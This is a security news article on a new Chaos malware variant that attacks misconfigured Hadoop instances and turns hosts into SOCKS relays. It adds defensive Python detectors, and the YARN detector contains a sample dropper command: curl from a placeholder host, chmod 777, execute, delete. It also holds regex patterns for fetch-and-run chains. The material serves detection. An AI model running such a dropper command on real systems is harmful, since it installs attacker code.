
Cybersecurity researchers have warned of a new variant of the “Chaos” malware that targets misconfigured cloud deployments, marking an expansion of the infrastructure botnets go after.
“Chaos malware is increasingly targeting misconfigured cloud deployments, expanding beyond its traditional focus on routers and edge devices,” Darktrace said in a new report.
Chaos was first documented by Lumen Black Lotus Labs in September 2022 and is described as cross-platform malware that targets Windows and Linux environments and can execute remote shell commands, drop additional modules, propagate to other hosts by brute-forcing SSH credentials or reusing stolen SSH keys, mine cryptocurrencies, and launch distributed denial of service (DDoS) attacks over HTTP, TLS, TCP, UDP, and WebSockets.
Chaos is believed to be an evolution of Kaiji, an older DDoS malware family known for targeting misconfigured Docker instances. At this time, it is unclear who is behind the operation, but the presence of Chinese characters and the use of China-based infrastructure suggest that the threat actor may be of Chinese origin.
Darktrace said it identified the new variant last month in its honeypot network, where it was delivered to intentionally misconfigured Hadoop instances that allow remote code execution on the service. The attack began with an HTTP request to the Hadoop deployment to create a new application.
The application, in turn, embedded a series of shell commands to retrieve the Chaos agent binary from an attacker-controlled server (“pan.tenire[.]com”), set its permissions to read, write, and execute for all users (“chmod 777”), run the binary, and then remove the artifacts from disk to minimize the forensic trail.
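The chain described above (fetch a binary over HTTP, chmod 777, execute, delete) is easy to spot in the application submission itself if the Hadoop deployment logs the request bodies it receives. The following detection script is an added example, not code from Darktrace or from the Chaos operators. It assumes the "create application" request is the Hadoop YARN ResourceManager REST API submission body, where the launch command sits at `am-container-spec.commands.command`; the domain, paths and application IDs in the sample bodies are constructed placeholders, not indicators from the report.

```python
import json
import re

# One regex per stage of the fetch / chmod / run / delete chain described in
# the report. Any two stages in a single container launch command is enough to
# raise an alert; a legitimate ApplicationMaster command normally just starts a
# JVM from a cluster-local path and matches none of them.
STAGE_PATTERNS = {
    "remote_fetch": re.compile(r"\b(?:curl|wget)\b[^;&|]*?https?://", re.I),
    "world_rwx": re.compile(r"\bchmod\s+(?:777|a\+rwx|\+x|u\+x)\b"),
    "run_from_scratch_dir": re.compile(r"(?:^|[;&|]\s*)(?:\./|/tmp/|/dev/shm/|/var/tmp/)\S+"),
    "artifact_cleanup": re.compile(r"\brm\s+-\w*f\w*\b"),
    "pipe_to_shell": re.compile(r"\|\s*(?:sh|bash)\b"),
}


def extract_commands(body):
    """Return the container launch command(s) from a YARN submission body.

    Assumption: the command lives at am-container-spec.commands.command, the
    field layout of the ResourceManager REST API's POST /ws/v1/cluster/apps.
    """
    spec = body.get("am-container-spec", {})
    cmd = spec.get("commands", {}).get("command")
    if cmd is None:
        return []
    if isinstance(cmd, list):
        return [str(c) for c in cmd]
    return [str(cmd)]


def score_command(command):
    """Name the chain stages present in one shell command and decide on alerting."""
    hits = sorted(name for name, rx in STAGE_PATTERNS.items() if rx.search(command))
    return {"hits": hits, "suspicious": len(hits) >= 2}


def inspect_submission(raw_json):
    """Inspect one logged submission body and summarise what was found."""
    body = json.loads(raw_json)
    results = [score_command(c) for c in extract_commands(body)]
    return {
        "application_id": body.get("application-id"),
        "suspicious": any(r["suspicious"] for r in results),
        "hits": sorted({h for r in results for h in r["hits"]}),
    }


# Constructed sample bodies. malware.example, /tmp/.x and the IDs are placeholders.
MALICIOUS_SUBMISSION = json.dumps({
    "application-id": "application_1700000000000_0042",
    "application-name": "health-check",
    "am-container-spec": {"commands": {"command":
        "curl -fsSL http://malware.example/agent -o /tmp/.x; chmod 777 /tmp/.x; /tmp/.x; rm -f /tmp/.x"}},
    "application-type": "YARN",
})
BENIGN_SUBMISSION = json.dumps({
    "application-id": "application_1700000000000_0043",
    "application-name": "wordcount",
    "am-container-spec": {"commands": {"command":
        "$JAVA_HOME/bin/java -Xmx512m org.apache.hadoop.mapreduce.v2.app.MRAppMaster 1>stdout 2>stderr"}},
    "application-type": "MAPREDUCE",
})

if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_SUBMISSION), ("benign", BENIGN_SUBMISSION)):
        print(label, inspect_submission(body))
```

The threshold of two stages is deliberate: a lone `chmod 777` in a job's launch command is sloppy but common, whereas an HTTP download followed by execution from a scratch directory is the shape of a dropper regardless of which botnet is behind it. The more durable fix is not to expose the ResourceManager without authentication in the first place; this check is for catching the ones that are.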
An interesting aspect of this attack is that the same domain was previously used in an email phishing campaign run by the Chinese cybercrime group Silver Fox to deliver decoy documents and the ValleyRAT malware. That campaign was codenamed “Operation Silk Lure” by Seqrite Labs in October 2025.
The 64-bit ELF binary is a rebuilt and updated version of Chaos that keeps most of the core feature set intact while reworking parts of it. One of the more significant changes is the removal of the functionality that allowed the malware to spread over SSH and exploit router vulnerabilities.
In its place is a new SOCKS proxy feature that lets compromised systems relay traffic on the operators' behalf. Routing through victim hosts hides the true origin of the malicious activity and makes it harder for defenders to attribute, detect, and block it.
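A host that has been turned into a relay will start receiving SOCKS handshakes from strangers, so a cheap detection is to parse the first client bytes of inbound TCP flows and flag any server that gets a SOCKS4 or SOCKS5 greeting without being a sanctioned proxy. The parser below is an added example written for this article, not Darktrace's detection logic and not derived from the Chaos binary; it follows the RFC 1928 (SOCKS5) and SOCKS4/4a byte layouts, and the flow records it runs over are constructed sample data with documentation addresses.

```python
import ipaddress
from typing import Optional

SOCKS5_COMMANDS = {1: "connect", 2: "bind", 3: "udp-associate"}


def parse_socks(payload: bytes) -> Optional[dict]:
    """Describe a SOCKS client message, or return None if the bytes are not one."""
    if len(payload) >= 3 and payload[0] == 0x05:
        nmethods = payload[1]
        # SOCKS5 greeting: VER NMETHODS METHODS...  (05 01 00 = "no auth")
        if nmethods and len(payload) == 2 + nmethods:
            return {"version": 5, "message": "greeting", "methods": list(payload[2:])}
        # SOCKS5 request: VER CMD RSV ATYP DST.ADDR DST.PORT
        if len(payload) >= 4 and payload[1] in SOCKS5_COMMANDS and payload[2] == 0:
            atyp = payload[3]
            if atyp == 1 and len(payload) == 10:          # IPv4
                host, port_off = str(ipaddress.IPv4Address(payload[4:8])), 8
            elif atyp == 3 and len(payload) >= 5 and len(payload) == 7 + payload[4]:  # domain
                host, port_off = payload[5:5 + payload[4]].decode("ascii", "replace"), 5 + payload[4]
            elif atyp == 4 and len(payload) == 22:        # IPv6
                host, port_off = str(ipaddress.IPv6Address(payload[4:20])), 20
            else:
                return None
            port = int.from_bytes(payload[port_off:port_off + 2], "big")
            return {"version": 5, "message": SOCKS5_COMMANDS[payload[1]], "host": host, "port": port}
    # SOCKS4/4a request: VN CD DSTPORT(2) DSTIP(4) USERID NUL [HOSTNAME NUL]
    if len(payload) >= 9 and payload[0] == 0x04 and payload[1] in (1, 2) and payload[-1] == 0:
        port = int.from_bytes(payload[2:4], "big")
        ip = payload[4:8]
        host = str(ipaddress.IPv4Address(ip))
        fields = payload[8:-1].split(b"\x00")
        # SOCKS4a signals "hostname follows the user id" with a 0.0.0.x address
        if ip[:3] == b"\x00\x00\x00" and ip[3] != 0 and len(fields) >= 2:
            host = fields[1].decode("ascii", "replace")
        return {"version": 4, "message": "connect" if payload[1] == 1 else "bind",
                "host": host, "port": port}
    return None


def find_proxy_abuse(flows, allowed_proxies=frozenset()):
    """Flag servers that receive SOCKS handshakes but are not sanctioned proxies.

    flows: iterable of (client_ip, server_ip, server_port, first_client_payload).
    Seeing the client side is enough to open an investigation; the server's
    reply (05 00 for SOCKS5) confirms the relay is actually answering.
    """
    findings = []
    for client, server, port, payload in flows:
        parsed = parse_socks(payload)
        if parsed and server not in allowed_proxies:
            findings.append({"client": client, "relay": server, "relay_port": port, **parsed})
    return findings


# Constructed flow records (RFC 5737 documentation addresses, made-up ports).
FLOWS = [
    ("203.0.113.7", "10.0.2.15", 1080, bytes([0x05, 0x01, 0x00])),
    ("203.0.113.7", "10.0.2.15", 1080,
     bytes([0x05, 0x01, 0x00, 0x03, 11]) + b"example.org" + (443).to_bytes(2, "big")),
    ("10.0.2.20", "10.0.2.15", 8080, b"GET / HTTP/1.1\r\nHost: web\r\n\r\n"),
    ("198.51.100.9", "10.0.2.15", 44321,
     bytes([0x04, 0x01]) + (25).to_bytes(2, "big") + bytes([192, 0, 2, 10]) + b"\x00"),
]

if __name__ == "__main__":
    for finding in find_proxy_abuse(FLOWS):
        print(finding)
```

The fourth flow is the one to worry about: an unauthenticated SOCKS4 CONNECT to port 25 on a third party means the host is being used as an outbound mail relay, which is exactly the kind of traffic a proxy-for-hire botnet sells. Matching on the handshake rather than on the port matters because, as here, the relay need not listen on 1080.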
“Furthermore, several features previously thought to be inherited from Kaiji have also changed, suggesting that the attackers have rewritten or extensively refactored the malware,” Darktrace added.
The addition of proxy functionality is likely a sign that the operators are looking to monetize their botnet beyond crypto mining and DDoS-for-hire by offering a wider range of illicit services to compete in the cybercrime market.
“While Chaos is not new malware, its continued evolution highlights cybercriminals’ dedication to expanding their botnets and enhancing the capabilities at their disposal,” Darktrace concluded. “Recent changes in botnets such as AISURU and Chaos to include proxy services as a core functionality demonstrate that denial of service is no longer the only risk these botnets pose to organizations and their security teams.”
